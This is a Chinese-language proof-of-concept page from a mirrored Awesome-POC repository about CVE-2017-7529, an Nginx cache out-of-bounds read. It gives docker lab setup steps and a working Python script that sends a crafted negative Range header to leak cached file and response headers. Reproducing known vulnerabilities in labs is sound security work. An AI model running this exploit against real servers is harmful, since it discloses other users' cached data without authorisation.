admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 19:38:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web服务器漏洞/Nginx越界读取缓存漏洞 CVE-2017-7529.md
Threekiii a1b514a449 Web服务器漏洞
2022-02-21 10:26:43 +08:00

60 lines
1.8 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Nginx越界读取缓存漏洞 CVE-2017-7529
## 漏洞描述
Nginx在反向代理站点的时候通常会将一些文件进行缓存特别是静态文件。缓存的部分存储在文件中每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件则Nginx会直接将该文件中的“HTTP返回包体”返回给用户。
如果我的请求中包含Range头Nginx将会根据我指定的start和end位置返回指定长度的内容。而如果我构造了两个负的位置如(-600, -9223372036854774591)将可能读取到负位置的数据。如果这次请求又命中了缓存文件则可能就可以读取到缓存文件中位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”等内容。
## 影响版本
```
Nginx version 0.5.6 - 1.13.2
```
## 环境搭建
```plain
git clone https://github.com/vulhub/vulhub.git
cd vulhub/nginx/CVE-2017-7529
docker-compose up -d
```
访问 http://xxx.xxx.xxx.xxx:8080 正常即可
![](../../images/1-16454100070901.png)
## 漏洞复现
使用目录下的POC进行验证
```plain
python poc.py http://xxx.xxx.xxx.xxx:8080/
```
![](../../images/2-16454100136592.png)
## 漏洞POC
```python
#!/usr/bin/env python
import sys
import requests
if len(sys.argv) < 2:
print("%s url" % (sys.argv[0]))
print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))
sys.exit()
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
}
offset = 605
url = sys.argv[1]
file_len = len(requests.get(url, headers=headers).content)
n = file_len + offset
headers['Range'] = "bytes=-%d,-%d" % (
n, 0x8000000000000000 - n)
r = requests.get(url, headers=headers)
```
Reference in New Issue View Git Blame Copy Permalink